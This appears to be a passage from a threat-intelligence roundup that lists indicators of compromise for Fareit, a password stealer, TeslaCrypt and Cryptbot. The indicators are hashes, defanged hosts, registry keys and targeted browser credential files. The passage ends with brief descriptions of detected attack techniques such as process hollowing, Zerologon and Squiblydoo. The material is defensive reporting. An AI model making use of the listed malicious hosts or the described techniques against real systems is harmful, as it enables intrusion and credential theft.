022a2cb6f5838cb49260a8b177499bda54bd7ed92ec5e290fdd47624c650af9b 05a7b78c6b8c171f82b3a2e1ac43d3b8aa78d107f79556d170df3102482db73c 0860b556bb282f9f9746caa2c6f5f23e2eb5b4b8362b1d9deeeb39a0d785b7ad 1905fe04658a3f434b10af04ee702dd473ac62fcd5fb0d3084a2af056d7de155 226242c64be090bfcb938be1a68441d3d9234a7bc26ce586c65f39e1263acfcd 23e0aeb3ffb49ed80b16ac75f6a722fcfc238ab1db044293f6b6085ea8f445e3 26fe21adb4ee339f55e93c486902ad4c669ddc3dc5a65e838b7ffbe9c821fba6 296dee6aaacf6487f012fd18d41a77d57b9e6fa2bc7d30389962ea7e2baa32c3 2cdb0d0750ce70881719d471cb73f63affeb75e541d59f1a5a2cf906c0772d86 3cfe8e7b07ba2f578cf713fdf0679b8200350fea26dedf49c3e8287f4ba27b95 417b02147a4e2c55f7bcb8528b0d4f518e0b66bf0297d99afeaaa29dde4b4396 4aa970f737da2718ea873f13aab46a776da93a40d27313e2ce387e947f717b89 4e81342e03ac707a88e057c53171e17665cd5d8b15899ec3931427f9d867815e 506a3f315ca523aeb00110c0c7aa95a28a324d8eb665535b4dfb5bb7f5769d1a 543b4dcac214eeaa006469df0697a9259a745a3c4c65b6bc64dd7639104a473b 5e8eb7511596acb43df64b54ba844024783bbb2a38cb458799cb939800ffb2eb 637cebab33df49e938eedf24c0e9c37a36aeb84b861d6bd59ea28db466b7f54f 6477663119f215e6f17f65697146f48e043a513b9bc38323ee71379bc669054e 6ca78e8e4072c5de888c5f6f84752f136a6886b9246f9b172fb5a7f59aa39d26 6cf9dcdc0ec7de7595858e857eb31c91ced6602247f110c34ad34143c7db54c0 6dcd3d0919c8536128cf6e34cca0e5d3b5e574404dcf82ec463e123e2f4b5f45 71968d577cc9a2e571373a4cacbdeb6f7385274e482326be2fd407c6ad1a1db7 756a97af1cbb171ed55725b2d188944498476bc589c562af3c0c9110b4aec4d2 7590c06c2c654eecd955d5921120287e5423dc2cba57d451d980a9f4b74cb3ad 7f7493bd79fd3e7ca293581ca2129c6c45e9617050dd921a0c75fc53d408cf89
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Trojan.Fareit-9900344-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\WINRAR 11
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 11
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
11
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
11
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
11
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
11
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
138[.]128[.]171[.]170 3
75[.]98[.]175[.]114 2
166[.]62[.]121[.]61 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
manualportia[.]com[.]br 3
superiorbroomproducers[.]com 2
crawfishtx[.]com 1
Files and or directories created Occurrences
%TEMP%\<random, matching '[0-9]{5,6}'>.bat 11
%TEMP%\1051421727.bat 1
%TEMP%\1051419262.bat 1
%TEMP%\1051422413.bat 1
%TEMP%\1051418217.bat 1
%TEMP%\1051421976.bat 1
%TEMP%\1051423677.bat 1
%TEMP%\1051421025.bat 1
%TEMP%\1051419574.bat 1
%TEMP%\1051418919.bat 1
%TEMP%\1051423302.bat 1
%TEMP%\1051422819.bat 1

File Hashes

0b795bf7b80a397a0ff158f3133b372875057d88d1a33c589a2e919e05615a6c 105b9704073855b7ea84cd814fc8cf0a8a5fbbbe2e5d757731e0157f2cda2a24 129223119c92e31c9f9d47c61f2301f0b568b240b9180361a57e42dcf52cb3dd 2ce7ad2edfed9bf00a5df059bc2e83d4e5570765d1ce3b512926a32ba458b1b6 38ae7ce2ca376b00c6a49911902c6256b74e78611977e538b522596a502d06ba a59720e7db0f1edc4434365ae7efc1aa2bf820cb8705441f61c177cb001a70c1 cc04e1f5ca1df70aa70bb91d7985e985f7325833da2d3cb7d98847607743d9a7 d83a1c7282f419d9b80292ab8be338b84143fc5b4ca97fb17285721f9aee0065 dc90b17949b1004ea70d7bbf2ec150015f4b2bef9bc1ce588a1aee3a802b4515 f0e6bb54691ec2494c402bdb78853d52ce0e5a314917f03f7ec99823d53256e4 fbdd7b15af60287fbd839399f50d9add20b13dc4265bf10be803c7c72d777fb3

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Passwordstealera-9900629-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 17
Mutexes Occurrences
Global\d7716441-2842-11ec-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
132[.]226[.]8[.]169 13
158[.]101[.]44[.]242 12
132[.]226[.]247[.]73 12
104[.]21[.]19[.]200 8
216[.]146[.]43[.]70/31 7
172[.]67[.]188[.]154 5
198[.]54[.]122[.]60 4
149[.]154[.]167[.]220 2
131[.]186[.]113[.]70 1
208[.]91[.]198[.]143 1
208[.]91[.]199[.]223 1
208[.]91[.]199[.]224/31 1
193[.]122[.]6[.]168 1
193[.]122[.]130[.]0 1
107[.]180[.]56[.]180 1
80[.]253[.]246[.]41 1
162[.]214[.]77[.]81 1
199[.]189[.]104[.]12 1
89[.]252[.]182[.]52 1
162[.]214[.]50[.]135 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]dyndns[.]org 17
freegeoip[.]app 6
mail[.]privateemail[.]com 4
checkip[.]dyndns[.]com 3
api[.]telegram[.]org 2
us2[.]smtp[.]mailhostbox[.]com 1
mail[.]faks-allied-health[.]com 1
mail[.]okurmakina[.]com[.]tr 1
okurmakina[.]com[.]tr 1
mail[.]nclanka[.]lk 1
internal[.]haciendacantalagua[.]com 1
mail[.]haciendacantalagua[.]com 1
mail[.]efeforklift[.]com[.]tr 1
mail[.]aninditaeng[.]net 1
nclanka[.]lk 1

File Hashes

29f7d6ea06b162f3958d90e90f4dca764d61c4a59345014cc82580e6dece68ad 2ce622d500cacf5a2cfce7f8ab41b0942a991a8a4fce32fc7d8984e5ff4eac77 5a7069de34bc25503f1697122ece6e7c4ed8126f91bf54e14ff71376238e111e 5b480b41bc60e4b4ce885c794023fba833c2ebce5404a803d1ccae3c06967157 6e9e6f46101684f027120ad7ad467587899924d49387c7feab1f792342575e4b 88a1ad8026566ae6d5ad0f11bbfa3b67d08866f261a96ead17a97aa4e7a02bd6 894d4ba6d8232d91019f1cb563be4723bc41bb68dcb29c30c6292556c3cfa016 973e111c802eaa32a828ed58e298c5a8efdcd8dba08b24a0e2f14c4766095b21 9e0c82ff4f7cba5681b2961e93054f80aa9cad6fe8a1c8efada8682135b2fcbe a3ad4554c582908654304ad34c10e5a00cfbe0c06d28117b17fb4acabc8fea72 c81ada1843071c17fbc30d0f486eff38c32e8e99bc20dd9233affb37b82a4556 d4f1a84eedf38127edc741771c3f1edbad8d4fb02fce8a79c4b90bc0a68ad849 d8c0c6009138939fa0d5a1a373e85cc05b8e9c18d83c33f6821d6be92fcca734 dc157362e9c0469b3d8909770c5879a1e5cbaa6ae5e0d8203c536cbce6131901 e3daf05d3602f2d2602bb6d2e9a9d4a24624f882897e14d82ebf0f9bdd9626d5 e56a7b6c398eb2069552234566ff0cb3239502a1fabf2ae7d856958a0782ba4e ed746deddbbe7a23a1e388211e47ccc40a0595ce3409a919fd5f73308abd9ec2

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.TeslaCrypt-9901319-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\TRUEIMG 23
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 23
<HKU>\.DEFAULT\SOFTWARE\TRUEIMG 14
<HKCU>\SOFTWARE\TRUEIMG
Value Name: ID
14
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 14
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
Value Name: data
14
Mutexes Occurrences
__ms_342234_ 23
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
204[.]11[.]56[.]48 23
184[.]168[.]131[.]241 23
198[.]1[.]95[.]93 23
192[.]195[.]77[.]147 23
62[.]75[.]170[.]35 23
198[.]185[.]159[.]144/31 13
198[.]49[.]23[.]144/31 12
23[.]199[.]63[.]11 7
23[.]199[.]63[.]83 4
23[.]63[.]245[.]50 2
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
myredhour[.]com 23
controlfreaknetworks[.]com 23
sappmtraining[.]com 23
kel52[.]com 23
apps[.]identrust[.]com 7
ext-cust[.]squarespace[.]com 7
a1952[.]dscq[.]akamai[.]net 7
konnectadventure[.]com 7
www[.]konnectadventure[.]com 7
a767[.]dspw65[.]akamai[.]net 2
Files and or directories created Occurrences
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\1JV85UNH.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\6TSOP6FP.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\6UIR535Q.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\778OELZF.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\BDDA1TQA.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\C8UQ3ILV.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\CKFULNYU.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\D3V8ZB0V.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\DFCMI390.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\DNZVO86A.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\EOZBRPJV.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\FF9U33OW.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\FRKK5EC8.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\GRVXVJCO.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\I9JT8I4P.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\JAQ17N5E.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\KBEKKOGQ.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\LAYXCVQE.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\LCB33LEZ.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\LCBHCHSX.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\LJTF3CDQ.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\LNTPAIO9.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\MJ9G33SY.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\N9FEOE2J.txt.mp3 (copy) 23
%LOCALAPPDATA%\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\O21EX4U8.txt.mp3 (copy) 23
*See JSON for more IOCs

File Hashes

0412ae653465f4f1d04e6488ed21d8bac7fd5fc327d5e4b26392b03e58c7138a 0f08d946632bbac50e9513f48b6227a1f246c7bac4f33f937f0e3adb50f5b6c5 1dc77c4895fa4fe576e81336ec8497d4cac887c75fa9f3bdae54302f51f394e2 399bde9e2eacd20b6304443d5694311376ffc199a53373caa5be5704260388a0 4ce2ce82a2f96f28971d0d34c7b7302bfa540b0087e550d64bba470173866c42 5ec89712a5ca3c6097def18ec885b2aa771ca0708d4a98ee2603c255fbd18a52 67a5551fd8a916862fe5fafd3220dd4e7b24e3006b56e5816ce3de90718bf98b 7af790e5adaa5a59a673f749247873fac5ad35d8455623dfd9ea5581d36d93ae 7d3ac2f7d9298e566d1fdf08900e2fa5924c15e22d76d4fdde12bd464161a42a 7f0e59ae48c2ef18fee133de5820fe5e3c776db50019cb365826ea66bc7fa391 83a3651c76005cc7db6b8c38c3ce46b78c8b688237f298ffd5b21ff70755011a 8b538787662cd5dd0aecb06520f43a7fc2f638acd7299e652168dece1ee44a19 95067347907987c71203d0645155a22f725c87b2bcc882b8bcee2f89f8f6e51f aff7ee708fec6078948284d581319940a1b98da77e455ae89df9775d61207e1c b104e819789c544c85751c7b9f41fd8b19eed851c03b9a7f4f7e3984fd8e1932 b4c185a664015106c0fc76273c780b1444ffa291dafda278e71c1d7e14d4f01f c1b8c297c96d78e1b93a7451b1a6b086f8d9c73385a30919b41d3871be33cc5f c6d175058f82a22e571297f3a65482fce8a9ce022f3dadac37b0132258622849 cae4544fb037757d0aabcdc24453b469b93e4fd3ddf64333bee68888cff998bf df7d13b02692189c7b78ce1155b8cce48f9bdad966eb31d9a4dd0eb277221e3e e5155d78bb1801c688da91dda5d55a4b745e2b137b98fefb9a130b7ff20081ff e60be7a47db3d2bad1615c32cc2fff36ef52befa1c1ee614ad7f02d56a6ce2ad f990804b3c6544b0f6e0ab590af585a9057f7bfc8e84e206c21dbaa1d9671a77

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.Cryptbot-9901331-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 19
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
88[.]99[.]66[.]31 19
208[.]95[.]112[.]1 19
34[.]102[.]136[.]180 19
104[.]192[.]141[.]1 19
69[.]164[.]0[.]128 2
8[.]248[.]153[.]254 2
69[.]164[.]0[.]0 1
8[.]253[.]132[.]120 1
8[.]253[.]45[.]239 1
8[.]249[.]233[.]254 1
8[.]253[.]139[.]121 1
8[.]248[.]163[.]254 1
8[.]249[.]223[.]254 1
162[.]0[.]210[.]44 1
8[.]248[.]167[.]254 1
65[.]108[.]80[.]190 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ip-api[.]com 19
iplogger[.]org 19
bitbucket[.]org 19
2no[.]co 19
saytt06[.]top 19
urep04[.]top 19
ebookreadersoftware[.]com 19
fg[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 9
windowsupdate[.]s[.]llnwi[.]net 3
Files and or directories created Occurrences
%TEMP%\dghf.txt 19
%TEMP%\fhgfgf.txt 19
%TEMP%\trgd.txt 19
%ProgramData%\Urebe 19
%ProgramData%\Kassee 19
%TEMP%\gvfcdfgv.txt 19
%TEMP%\gvfcgh.txt 19
%TEMP%\hbgf.txt 19
%TEMP%\hbgvf.exe 19
%ProgramFiles(x86)%\Blubnerg 19
%ProgramFiles(x86)%\Blubnerg\sant 19
%ProgramFiles(x86)%\Blubnerg\sant\kartol.exe 19
%TEMP%\gdgrf.exe 19
%APPDATA%\brgvfcdsx.exe 19
%APPDATA%\yhbtgvrfcd.exe 19
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookiesf 19
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookiesm 19
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Dataf 19
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Datam 19
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Dataf 19
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Web Datam 19
%TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp 19
%TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp\nsExec.dll 19
%TEMP%\ns<random, matching '[a-z][A-F0-9]{4}'>.tmp\UAC.DLL 19
%ProgramFiles%\Blubnerg\sant\kartol.exe 18
*See JSON for more IOCs

File Hashes

03708a2eeb1d04275ab963ae965504701c3eeaf1e3188363533038e3edb5b84e 0f2f5e145bd63005b2457bb741e475e6f34627b8b0e66b12e924a152a4b177f8 2930f3604cf11da9d8a4d2a751b420deaa12e540ab13b7d1f54431a9b51f333c 32d069cf8562d57c41b2fc2a3bc8f0c8ef1f7a3e1e216bf329a6778111351415 3993ddb32e898160739dc00cbffd22590c3fc3977cb9e45faf87979f0d2c1ba0 5e0b61bdee810750efc77fdc4f089c3125a588b01994d470d59e5b83d514ab91 7d589381584c0634a9ff5bbd915aff2f2756affce71d719dfb2e968df4dca929 7e1f66c8b71a7cbed0d3bed0f2267af1a441418a8fbed41416cff4505a41190d 80b426a7370624982647bfe534eddfffdf0bc7c5961009f6390be519ace9dd49 9681de2bf9bd956b5f290a58289efe3b67bafc50eacdc18ee660d70fed1a2e70 9f224c5fb5bdbb3e5ec7766377e702922921f1239fc33202e93d985f780311a3 b2f35992ce1595c623d8d224ab2dae6403789b7303f0b3439c43030983b7647e c2e4131d9c50ae218478930758889fa1baae4176dda4d7580959098004258b13 c8ff40b80526c837436a03a09a3540458e8167c84f97f0f4cdd3961b01630b51 d7851cbcd4bb0cf7cb3c9bd4f5ab893bf94fa520ccc838cf79a9dd4f0485bf71 e6be86d707caccb0be7b1423fee7ca7ad9268e90b22f53c94c5bf3edac66c8fb f02cce39d4f9a1fb9a2c146cf3b8add1213d2051f941c558a0626aab5c1073d0 f7987035d0f332dd2b81377dacb1bd02f4e4fcf7ef2f29ecc8e8554b6972aa64 f808cd63e98047562f39e22011d2d14213897d71b50a483326747382fb9b7897

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (45166)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Crystalbit-Apple DLL double hijack detected - (7792)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Expiro Malware detected - (7379)
Expiro malware is unique in that it infiltrates executable files on both 32- and 64-bit Windows systems by appending its viral code to the host. It can be used to install malicious browser extensions, lower browser security settings, and steal account credentials.
Excessively long PowerShell command detected - (4473)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (4364)
A process associated with Microsoft Office, such as EXCEL.exe, OUTLOOK.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
CVE-2020-1472 exploit detected - (2964)
An attempt to exploit CVE-2020-1472 has been detected. Also known as "Zerologon". This is a privelege escalation vulnerability in Netlogon.
Dealply adware detected - (2084)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Reverse tcp payload detected - (2003)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
Squiblydoo application control bypass attempt detected. - (1152)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Kovter injection detected - (663)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.